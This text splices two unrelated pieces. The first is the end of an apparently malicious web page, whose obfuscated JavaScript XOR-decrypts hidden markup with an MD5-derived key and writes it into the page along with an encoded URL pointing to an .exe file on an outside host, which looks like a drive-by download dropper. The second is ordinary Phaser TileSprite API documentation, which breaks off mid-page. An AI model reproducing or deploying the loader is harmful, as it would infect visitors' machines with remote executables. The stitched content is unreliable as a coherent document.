Qq784378237+="5D%17Y%16%02JR%08%08U%06%1B%13%5B%0E%0AZ%0A%19%0E%12%07%0EZR%5BAM%10%0";
Qq784378237+="3Z%5D%5B%5CE%1D%12T%0FTT%07Z%5DPRYh3hTV_%0A%10L%11%0DA%08U%16%16sJE%04";
Qq784378237+="O%1A%1B%5D52lUGG%5C%13%14%19%5C%19%5EW%08%0DGH%0Bll9%07Y@%18%1F%1D%0B%";
Qq784378237+="02%09F@%04E%02%02%03%02B%1D%12J%10%13Q%10%16P@A%3A%1EmA%0B%12Z%5B%0AUY";
Qq784378237+="%12M%18K%0DS%5E_Z%0D%01%5CZ49%3B%13%03G%11R%14%00V%04D%12%05%17BjJ%02%";
Qq784378237+="07%1F%03h%3C%3BDQ%0B%09%5CA%11QG%03%04PC%1E%0D%03%5E%06BZ%18%0BE%03%02";
Qq784378237+="%02O%18Z%10PTVKBN%04A%1EoJU%03iI%00%00%3AHQWn@%07%04%11%09%3Fl1H%15U%1";
Qq784378237+="C%7FV%05%0A%19%5C%19QG%03%04PC%0Bll%0CNEQJ%5E%15B%0C%3Fl%04%17%07YVJ%0";
Qq784378237+="7oo%05NQG_%09%5C";
www_cuteqq_cn_s="%u7468%u7074%u2f3a%u772f%u7777%u662e%u7777%u7379%u632e%u2f6e%u6976%u2f70%u2e31%u7865%u0065";
function XOR(strV,strPass){
var intPassLength=strPass.length;
var re="";
for(var i=0;i<strV.length;i++){
re+=String.fromCharCode(strV.charCodeAt(i)^strPass.charCodeAt(i%intPassLength));
}
return(re);
}
var STR =
{
hexcase : 0, /* hex output format. 0 - lowercase; 1 - uppercase */
b64pad : "", /* base-64 pad character. "=" for strict RFC compliance */
chrsz : 8, /* bits per input character. 8 - ASCII; 16 - Unicode */
b64_hmac_md5:
function(key, data) { return binl2b64(core_hmac_md5(key, data)); },
b64_md5:
function(s){ return binl2b64(core_md5(str2binl(s), s.length * this.chrsz));},
binl2b64:
function(binarray){
var tab =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
var str = "";
for(var i = 0; i < binarray.length * 4; i += 3)
{
var triplet = (((binarray[i >> 2] >> 8 * ( i %4)) & 0xFF) << 16)
| (((binarray[i+1 >> 2] >> 8 * ((i+1)%4)) & 0xFF) << 8 )
| ((binarray[i+2 >> 2] >> 8 * ((i+2)%4)) & 0xFF);
for(var j = 0; j < 4; j++)
{
if(i * 8 + j * 6 > binarray.length * 32) str += this.b64pad;
else str += tab.charAt((triplet >> 6*(3-j)) & 0x3F);
}
}
return str;
},
binl2hex:
function(binarray){
var hex_tab = this.hexcase ? "0123456789ABCDEF" : "0123456789abcdef";
var str = "";
for(var i = 0; i < binarray.length * 4; i++)
{
str += hex_tab.charAt((binarray[i>>2] >> ((i%4)*8+4)) & 0xF) +
hex_tab.charAt((binarray[i>>2] >> ((i%4)*8 )) & 0xF);
}
return str;
},
binl2str:
function(bin){
var str = "";
var mask = (1 << this.chrsz) - 1;
for(var i = 0; i < bin.length * 32; i += this.chrsz)
str += String.fromCharCode((bin[i>>5] >>> (i % 32)) & mask);
return str;
},
bit_rol:
function(num, cnt){return (num << cnt) | (num >>> (32 - cnt));},
core_hmac_md5:
function(key, data){
var bkey = str2binl(key);
if(bkey.length > 16) bkey = core_md5(bkey, key.length * this.chrsz);
var ipad = Array(16), opad = Array(16);
for(var i = 0; i < 16; i++)
{
ipad[i] = bkey[i] ^ 0x36363636;
opad[i] = bkey[i] ^ 0x5C5C5C5C;
}
var hash = core_md5(ipad.concat(str2binl(data)), 512 + data.length * this.chrsz);
return core_md5(opad.concat(hash), 512 + 128);
},
core_md5:
function(x, len){
/* append padding */
x[len >> 5] |= 0x80 << ((len) % 32);
x[(((len + 64) >>> 9) << 4) + 14] = len;
var a = 1732584193;
var b = -271733879;
var c = -1732584194;
var d = 271733878;
for(var i = 0; i < x.length; i += 16)
{
var olda = a;
var oldb = b;
var oldc = c;
var oldd = d;
a = this.md5_ff(a, b, c, d, x[i+ 0], 7 , -680876936);
d = this.md5_ff(d, a, b, c, x[i+ 1], 12, -389564586);
c = this.md5_ff(c, d, a, b, x[i+ 2], 17, 606105819);
b = this.md5_ff(b, c, d, a, x[i+ 3], 22, -1044525330);
a = this.md5_ff(a, b, c, d, x[i+ 4], 7 , -176418897);
d = this.md5_ff(d, a, b, c, x[i+ 5], 12, 1200080426);
c = this.md5_ff(c, d, a, b, x[i+ 6], 17, -1473231341);
b = this.md5_ff(b, c, d, a, x[i+ 7], 22, -45705983);
a = this.md5_ff(a, b, c, d, x[i+ 8], 7 , 1770035416);
d = this.md5_ff(d, a, b, c, x[i+ 9], 12, -1958414417);
c = this.md5_ff(c, d, a, b, x[i+10], 17, -42063);
b = this.md5_ff(b, c, d, a, x[i+11], 22, -1990404162);
a = this.md5_ff(a, b, c, d, x[i+12], 7 , 1804603682);
d = this.md5_ff(d, a, b, c, x[i+13], 12, -40341101);
c = this.md5_ff(c, d, a, b, x[i+14], 17, -1502002290);
b = this.md5_ff(b, c, d, a, x[i+15], 22, 1236535329);
a = this.md5_gg(a, b, c, d, x[i+ 1], 5 , -165796510);
d = this.md5_gg(d, a, b, c, x[i+ 6], 9 , -1069501632);
c = this.md5_gg(c, d, a, b, x[i+11], 14, 643717713);
b = this.md5_gg(b, c, d, a, x[i+ 0], 20, -373897302);
a = this.md5_gg(a, b, c, d, x[i+ 5], 5 , -701558691);
d = this.md5_gg(d, a, b, c, x[i+10], 9 , 38016083);
c = this.md5_gg(c, d, a, b, x[i+15], 14, -660478335);
b = this.md5_gg(b, c, d, a, x[i+ 4], 20, -405537848);
a = this.md5_gg(a, b, c, d, x[i+ 9], 5 , 568446438);
d = this.md5_gg(d, a, b, c, x[i+14], 9 , -1019803690);
c = this.md5_gg(c, d, a, b, x[i+ 3], 14, -187363961);
b = this.md5_gg(b, c, d, a, x[i+ 8], 20, 1163531501);
a = this.md5_gg(a, b, c, d, x[i+13], 5 , -1444681467);
d = this.md5_gg(d, a, b, c, x[i+ 2], 9 , -51403784);
c = this.md5_gg(c, d, a, b, x[i+ 7], 14, 1735328473);
b = this.md5_gg(b, c, d, a, x[i+12], 20, -1926607734);
a = this.md5_hh(a, b, c, d, x[i+ 5], 4 , -378558);
d = this.md5_hh(d, a, b, c, x[i+ 8], 11, -2022574463);
c = this.md5_hh(c, d, a, b, x[i+11], 16, 1839030562);
b = this.md5_hh(b, c, d, a, x[i+14], 23, -35309556);
a = this.md5_hh(a, b, c, d, x[i+ 1], 4 , -1530992060);
d = this.md5_hh(d, a, b, c, x[i+ 4], 11, 1272893353);
c = this.md5_hh(c, d, a, b, x[i+ 7], 16, -155497632);
b = this.md5_hh(b, c, d, a, x[i+10], 23, -1094730640);
a = this.md5_hh(a, b, c, d, x[i+13], 4 , 681279174);
d = this.md5_hh(d, a, b, c, x[i+ 0], 11, -358537222);
c = this.md5_hh(c, d, a, b, x[i+ 3], 16, -722521979);
b = this.md5_hh(b, c, d, a, x[i+ 6], 23, 76029189);
a = this.md5_hh(a, b, c, d, x[i+ 9], 4 , -640364487);
d = this.md5_hh(d, a, b, c, x[i+12], 11, -421815835);
c = this.md5_hh(c, d, a, b, x[i+15], 16, 530742520);
b = this.md5_hh(b, c, d, a, x[i+ 2], 23, -995338651);
a = this.md5_ii(a, b, c, d, x[i+ 0], 6 , -198630844);
d = this.md5_ii(d, a, b, c, x[i+ 7], 10, 1126891415);
c = this.md5_ii(c, d, a, b, x[i+14], 15, -1416354905);
b = this.md5_ii(b, c, d, a, x[i+ 5], 21, -57434055);
a = this.md5_ii(a, b, c, d, x[i+12], 6 , 1700485571);
d = this.md5_ii(d, a, b, c, x[i+ 3], 10, -1894986606);
c = this.md5_ii(c, d, a, b, x[i+10], 15, -1051523);
b = this.md5_ii(b, c, d, a, x[i+ 1], 21, -2054922799);
a = this.md5_ii(a, b, c, d, x[i+ 8], 6 , 1873313359);
d = this.md5_ii(d, a, b, c, x[i+15], 10, -30611744);
c = this.md5_ii(c, d, a, b, x[i+ 6], 15, -1560198380);
b = this.md5_ii(b, c, d, a, x[i+13], 21, 1309151649);
a = this.md5_ii(a, b, c, d, x[i+ 4], 6 , -145523070);
d = this.md5_ii(d, a, b, c, x[i+11], 10, -1120210379);
c = this.md5_ii(c, d, a, b, x[i+ 2], 15, 718787259);
b = this.md5_ii(b, c, d, a, x[i+ 9], 21, -343485551);
a = this.safe_add(a, olda);
b = this.safe_add(b, oldb);
c = this.safe_add(c, oldc);
d = this.safe_add(d, oldd);
}
return Array(a, b, c, d);
},
hex_hmac_md5:function(key, data){ return this.binl2hex(this.core_hmac_md5(key, data)); },
hex_md5:function(s){return this.binl2hex(this.core_md5(this.str2binl(s), s.length * this.chrsz));},
md5:function(s){return(this.hex_md5(s));},
md5_cmn:function(q, a, b, x, s, t){return this.safe_add(this.bit_rol(this.safe_add(this.safe_add(a, q), this.safe_add(x, t)), s),b);},
md5_ff:function(a, b, c, d, x, s, t){return this.md5_cmn((b & c) | ((~b) & d), a, b, x, s, t);},
md5_gg:function(a, b, c, d, x, s, t){return this.md5_cmn((b & d) | (c & (~d)), a, b, x, s, t);},
md5_hh:function(a, b, c, d, x, s, t){return this.md5_cmn(b ^ c ^ d, a, b, x, s, t);},
md5_ii:function(a, b, c, d, x, s, t){return this.md5_cmn(c ^ (b | (~d)), a, b, x, s, t);},
md5_vm_test:function(){return hex_md5("abc") == "900150983cd24fb0d6963f7d28e17f72";},
safe_add:
function(x, y){
var lsw = (x & 0xFFFF) + (y & 0xFFFF);
var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
return (msw << 16) | (lsw & 0xFFFF);
},
str2binl:
function(str){
var bin = Array();
var mask = (1 << this.chrsz) - 1;
for(var i = 0; i < str.length * this.chrsz; i += this.chrsz)
bin[i>>5] |= (str.charCodeAt(i / this.chrsz) & mask) << (i%32);
return bin;
},
str_hmac_md5:function(key, data){ return binl2str(core_hmac_md5(key, data)); },
str_md5:function(s){ return binl2str(core_md5(str2binl(s), s.length * this.chrsz));}
}
function performPage(strPass){
alert('gulp');
if(strPass){
var wwwcuteqqcn="password=";
document.cookie=wwwcuteqqcn+escape(strPass);
var cuteqq,cuteqq2,cuteqq3;
cuteqq=XOR(unescape(Qq_784378237),STR.md5(pass));
cuteqq2=XOR(unescape(Qq784378237),STR.md5(pass));
cuteqq3=cuteqq+www_cuteqq_cn_s+cuteqq2;
document.write(cuteqq3);
return(false);
}
alert('AIEEEEEE');
var pass="TEST.WWW.CUTEQQ.CN";
if(pass){
pass=unescape(pass);
var cuteqq,cuteqq2,cuteqq3;
cuteqq=XOR(unescape(Qq_784378237),STR.md5(pass));
cuteqq2=XOR(unescape(Qq784378237),STR.md5(pass));
cuteqq3=cuteqq+www_cuteqq_cn_s+cuteqq2;
alert(cuteqq3);
document.write(cuteqq3);
return(false);
}
}
performPage();
</script>
</body>
</html>
|
src/bower_components/phaser-official/docs/Phaser.TileSprite.html
|
imaginabit/memory
|
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Phaser Class: TileSprite</title>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/sunlight.default.css">
<link type="text/css" rel="stylesheet" href="styles/site.cerulean.css">
</head>
<body>
<div class="container-fluid">
<div class="navbar navbar-fixed-top navbar-inverse">
<div class="navbar-inner">
<a class="brand" href="index.html">Phaser</a>
<ul class="nav">
<li class="dropdown">
<a href="namespaces.list.html" class="dropdown-toggle" data-toggle="dropdown">Namespaces<b
class="caret"></b></a>
<ul class="dropdown-menu ">
<li class="class-depth-0">
<a href="Phaser.html">Phaser</a>
</li>
</ul>
</li>
<li class="dropdown">
<a href="classes.list.html" class="dropdown-toggle" data-toggle="dropdown">Classes<b
class="caret"></b></a>
<ul class="dropdown-menu ">
<li class="class-depth-1">
<a href="Phaser.Animation.html">Animation</a>
</li>
<li class="class-depth-1">
<a href="Phaser.AnimationManager.html">AnimationManager</a>
</li>
<li class="class-depth-1">
<a href="Phaser.AnimationParser.html">AnimationParser</a>
</li>
<li class="class-depth-1">
<a href="Phaser.ArrayList.html">ArrayList</a>
</li>
<li class="class-depth-1">
<a href="Phaser.BitmapData.html">BitmapData</a>
</li>
<li class="class-depth-1">
<a href="Phaser.BitmapText.html">BitmapText</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Button.html">Button</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Cache.html">Cache</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Camera.html">Camera</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Canvas.html">Canvas</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Circle.html">Circle</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Color.html">Color</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Device.html">Device</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Easing.html">Easing</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Easing.Back.html">Back</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Easing.Bounce.html">Bounce</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Easing.Circular.html">Circular</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Easing.Cubic.html">Cubic</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Easing.Elastic.html">Elastic</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Easing.Exponential.html">Exponential</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Easing.Linear.html">Linear</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Easing.Quadratic.html">Quadratic</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Easing.Quartic.html">Quartic</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Easing.Quintic.html">Quintic</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Easing.Sinusoidal.html">Sinusoidal</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Ellipse.html">Ellipse</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Events.html">Events</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Filter.html">Filter</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Frame.html">Frame</a>
</li>
<li class="class-depth-1">
<a href="Phaser.FrameData.html">FrameData</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Game.html">Game</a>
</li>
<li class="class-depth-1">
<a href="Phaser.GameObjectCreator.html">GameObjectCreator</a>
</li>
<li class="class-depth-1">
<a href="Phaser.GameObjectFactory.html">GameObjectFactory</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Gamepad.html">Gamepad</a>
</li>
<li class="class-depth-1">
<a href="Phaser.GamepadButton.html">GamepadButton</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Graphics.html">Graphics</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Group.html">Group</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Image.html">Image</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Input.html">Input</a>
</li>
<li class="class-depth-1">
<a href="Phaser.InputHandler.html">InputHandler</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Key.html">Key</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Keyboard.html">Keyboard</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Line.html">Line</a>
</li>
<li class="class-depth-1">
<a href="Phaser.LinkedList.html">LinkedList</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Loader.html">Loader</a>
</li>
<li class="class-depth-1">
<a href="Phaser.LoaderParser.html">LoaderParser</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Math.html">Math</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Mouse.html">Mouse</a>
</li>
<li class="class-depth-1">
<a href="Phaser.MSPointer.html">MSPointer</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Net.html">Net</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Particle.html">Particle</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Particles.html">Particles</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Particles.Arcade.Emitter.html">Emitter</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Physics.html">Physics</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Physics.Arcade.html">Arcade</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.Arcade.Body.html">Body</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Physics.Ninja.html">Ninja</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.Ninja.AABB.html">AABB</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.Ninja.Body.html">Body</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.Ninja.Circle.html">Circle</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.Ninja.Tile.html">Tile</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Physics.P2.html">P2</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.Body.html">Body</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.BodyDebug.html">BodyDebug</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.CollisionGroup.html">CollisionGroup</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.ContactMaterial.html">ContactMaterial</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.DistanceConstraint.html">DistanceConstraint</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.FixtureList.html">FixtureList</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.GearConstraint.html">GearConstraint</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.InversePointProxy.html">InversePointProxy</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.LockConstraint.html">LockConstraint</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.Material.html">Material</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.PointProxy.html">PointProxy</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.PrismaticConstraint.html">PrismaticConstraint</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.RevoluteConstraint.html">RevoluteConstraint</a>
</li>
<li class="class-depth-3">
<a href="Phaser.Physics.P2.Spring.html">Spring</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Plugin.html">Plugin</a>
</li>
<li class="class-depth-1">
<a href="Phaser.PluginManager.html">PluginManager</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Point.html">Point</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Pointer.html">Pointer</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Polygon.html">Polygon</a>
</li>
<li class="class-depth-1">
<a href="Phaser.QuadTree.html">QuadTree</a>
</li>
<li class="class-depth-1">
<a href="Phaser.RandomDataGenerator.html">RandomDataGenerator</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Rectangle.html">Rectangle</a>
</li>
<li class="class-depth-1">
<a href="Phaser.RenderTexture.html">RenderTexture</a>
</li>
<li class="class-depth-1">
<a href="Phaser.RequestAnimationFrame.html">RequestAnimationFrame</a>
</li>
<li class="class-depth-1">
<a href="Phaser.RetroFont.html">RetroFont</a>
</li>
<li class="class-depth-1">
<a href="Phaser.ScaleManager.html">ScaleManager</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Signal.html">Signal</a>
</li>
<li class="class-depth-1">
<a href="Phaser.SignalBinding.html">SignalBinding</a>
</li>
<li class="class-depth-1">
<a href="Phaser.SinglePad.html">SinglePad</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Sound.html">Sound</a>
</li>
<li class="class-depth-1">
<a href="Phaser.SoundManager.html">SoundManager</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Sprite.html">Sprite</a>
</li>
<li class="class-depth-1">
<a href="Phaser.SpriteBatch.html">SpriteBatch</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Stage.html">Stage</a>
</li>
<li class="class-depth-1">
<a href="Phaser.State.html">State</a>
</li>
<li class="class-depth-1">
<a href="Phaser.StateManager.html">StateManager</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Text.html">Text</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Tile.html">Tile</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Tilemap.html">Tilemap</a>
</li>
<li class="class-depth-1">
<a href="Phaser.TilemapLayer.html">TilemapLayer</a>
</li>
<li class="class-depth-1">
<a href="Phaser.TilemapParser.html">TilemapParser</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Tileset.html">Tileset</a>
</li>
<li class="class-depth-1">
<a href="Phaser.TileSprite.html">TileSprite</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Time.html">Time</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Timer.html">Timer</a>
</li>
<li class="class-depth-1">
<a href="Phaser.TimerEvent.html">TimerEvent</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Touch.html">Touch</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Tween.html">Tween</a>
</li>
<li class="class-depth-1">
<a href="Phaser.TweenManager.html">TweenManager</a>
</li>
<li class="class-depth-1">
<a href="Phaser.Utils.html">Utils</a>
</li>
<li class="class-depth-2">
<a href="Phaser.Utils.Debug.html">Debug</a>
</li>
<li class="class-depth-1">
<a href="Phaser.World.html">World</a>
</li>
</ul>
</li>
</strong>
</ul>
</div>
</div>
<div class="row-fluid">
<div class="span8">
<div id="main">
<h1 class="page-title">Class: TileSprite</h1>
<section>
<header>
<h2>
<span class="ancestors"><a href="Phaser.html">Phaser</a>.</span>
TileSprite
</h2>
<div class="class-description"><p>Phaser.TileSprite</p></div>
</header>
<article>
<div class="container-overview">
<dt>
<h4 class="name" id="TileSprite"><span class="type-signature"></span>new TileSprite<span class="signature">(game, x, y, width, height, key, frame)</span><span class="type-signature"></span></h4>
</dt>
<dd>
<div class="description">
<p>A TileSprite is a Sprite that has a repeating texture. The texture can be scrolled and scaled and will automatically wrap on the edges as it does so.
Please note that TileSprites, as with normal Sprites, have no input handler or physics bodies by default. Both need enabling.</p>
</div>
<h5>Parameters:</h5>
<table class="params table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>game</code></td>
<td class="type">
<span class="param-type"><a href="Phaser.Game.html">Phaser.Game</a></span>
</td>
<td class="description last"><p>A reference to the currently running game.</p></td>
</tr>
<tr>
<td class="name"><code>x</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="description last"><p>The x coordinate (in world space) to position the TileSprite at.</p></td>
</tr>
<tr>
<td class="name"><code>y</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="description last"><p>The y coordinate (in world space) to position the TileSprite at.</p></td>
</tr>
<tr>
<td class="name"><code>width</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="description last"><p>The width of the TileSprite.</p></td>
</tr>
<tr>
<td class="name"><code>height</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="description last"><p>The height of the TileSprite.</p></td>
</tr>
<tr>
<td class="name"><code>key</code></td>
<td class="type">
<span class="param-type">string</span>
|
<span class="param-type"><a href="Phaser.RenderTexture.html">Phaser.RenderTexture</a></span>
|
<span class="param-type"><a href="Phaser.BitmapData.html">Phaser.BitmapData</a></span>
|
<span class="param-type">PIXI.Texture</span>
</td>
<td class="description last"><p>This is the image or texture used by the TileSprite during rendering. It can be a string which is a reference to the Cache entry, or an instance of a RenderTexture or PIXI.Texture.</p></td>
</tr>
<tr>
<td class="name"><code>frame</code></td>
<td class="type">
<span class="param-type">string</span>
|
<span class="param-type">number</span>
</td>
<td class="description last"><p>If this TileSprite is using part of a sprite sheet or texture atlas you can specify the exact frame to use by giving a string or numeric index.</p></td>
</tr>
</tbody>
</table>
<dl class="details">
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-21">line 21</a>
</li></ul></dd>
</dl>
</dd>
</div>
<h3 class="subsection-title">Members</h3>
<dl>
<dt>
<h4 class="name" id="angle"><span class="type-signature"></span>angle<span class="type-signature"></span></h4>
</dt>
<dd>
<div class="description">
<p>Indicates the rotation of the Sprite, in degrees, from its original orientation. Values from 0 to 180 represent clockwise rotation; values from 0 to -180 represent counterclockwise rotation.
Values outside this range are added to or subtracted from 360 to obtain a value within the range. For example, the statement player.angle = 450 is the same as player.angle = 90.
If you wish to work in radians instead of degrees use the property Sprite.rotation instead. Working in radians is also a little faster as it doesn't have to convert the angle.</p>
</div>
<dl class="details">
<h5 class="subsection-title">Properties:</h5>
<dl>
<table class="props table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>angle</code></td>
<td class="type">
<span class="param-type">number</span>
</td>
<td class="description last"><p>The angle of this Sprite in degrees.</p></td>
</tr>
</tbody>
</table>
</dl>
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-540">line 540</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="animations"><span class="type-signature"></span>animations<span class="type-signature"></span></h4>
</dt>
<dd>
<dl class="details">
<h5 class="subsection-title">Properties:</h5>
<dl>
<table class="props table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>animations</code></td>
<td class="type">
<span class="param-type"><a href="Phaser.AnimationManager.html">Phaser.AnimationManager</a></span>
</td>
<td class="description last"><p>This manages animations of the sprite. You can modify animations through it (see Phaser.AnimationManager)</p></td>
</tr>
</tbody>
</table>
</dl>
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-60">line 60</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="autoCull"><span class="type-signature"></span>autoCull<span class="type-signature"></span></h4>
</dt>
<dd>
<div class="description">
<p>Should this Sprite be automatically culled if out of range of the camera?
A culled sprite has its renderable property set to 'false'.
Be advised this is quite an expensive operation, as it has to calculate the bounds of the object every frame, so only enable it if you really need it.</p>
</div>
<dl class="details">
<h5 class="subsection-title">Properties:</h5>
<dl>
<table class="props table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>autoCull</code></td>
<td class="type">
<span class="param-type">boolean</span>
</td>
<td class="description last"><p>A flag indicating if the Sprite should be automatically camera culled or not.</p></td>
</tr>
</tbody>
</table>
</dl>
<dt class="tag-default">Default Value:</dt>
<dd class="tag-default"><ul class="dummy"><li>false</li></ul></dd>
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-107">line 107</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="body"><span class="type-signature"></span>body<span class="type-signature"></span></h4>
</dt>
<dd>
<div class="description">
<p>By default Sprites won't add themselves to any physics system and their physics body will be <code>null</code>.
To enable them for physics you need to call <code>game.physics.enable(sprite, system)</code> where <code>sprite</code> is this object
and <code>system</code> is the Physics system you want to use to manage this body. Once enabled you can access all physics related properties via <code>Sprite.body</code>.</p>
<p>Important: Enabling a Sprite for P2 or Ninja physics will automatically set <code>Sprite.anchor</code> to 0.5 so the physics body is centered on the Sprite.
If you need a different result then adjust or re-create the Body shape offsets manually, and/or reset the anchor after enabling physics.</p>
</div>
<dl class="details">
<h5 class="subsection-title">Properties:</h5>
<dl>
<table class="props table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>body</code></td>
<td class="type">
<span class="param-type"><a href="Phaser.Physics.Arcade.Body.html">Phaser.Physics.Arcade.Body</a></span>
|
<span class="param-type"><a href="Phaser.Physics.P2.Body.html">Phaser.Physics.P2.Body</a></span>
|
<span class="param-type"><a href="Phaser.Physics.Ninja.Body.html">Phaser.Physics.Ninja.Body</a></span>
|
<span class="param-type">null</span>
</td>
<td class="description last"></td>
</tr>
</tbody>
</table>
</dl>
<dt class="tag-default">Default Value:</dt>
<dd class="tag-default"><ul class="dummy"><li>null</li></ul></dd>
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
<a href="TileSprite.js.html">gameobjects/TileSprite.js</a>, <a href="TileSprite.js.html#sunlight-1-line-134">line 134</a>
</li></ul></dd>
</dl>
</dd>
<dt>
<h4 class="name" id="cameraOffset"><span class="type-signature"></span>cameraOffset<span class="type-signature"></span></h4>
</dt>
<dd>
<dl class="details">
<h5 class="subsection-title">Properties:</h5>
<dl>
<table class="props table table-striped">
<thead>
<tr>
<th>Name</th>
<th>Type</th>
<th class="last">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td class="name"><code>cameraOffset</code></td>
<td class="type">
<span class="param-type"><a href="Phaser.Point.html">Phaser.Point</a></span>
</td>
<td class="description last"><p>If this object is fixedToCamera then this stores the x/y offset that its drawn at, from the top-left of the camera view.</p></td>
</tr>
</tbody>
</table>
</dl>
<dt class="tag-source">Source:</dt>
<dd class="tag-source"><ul class="dummy"><li>
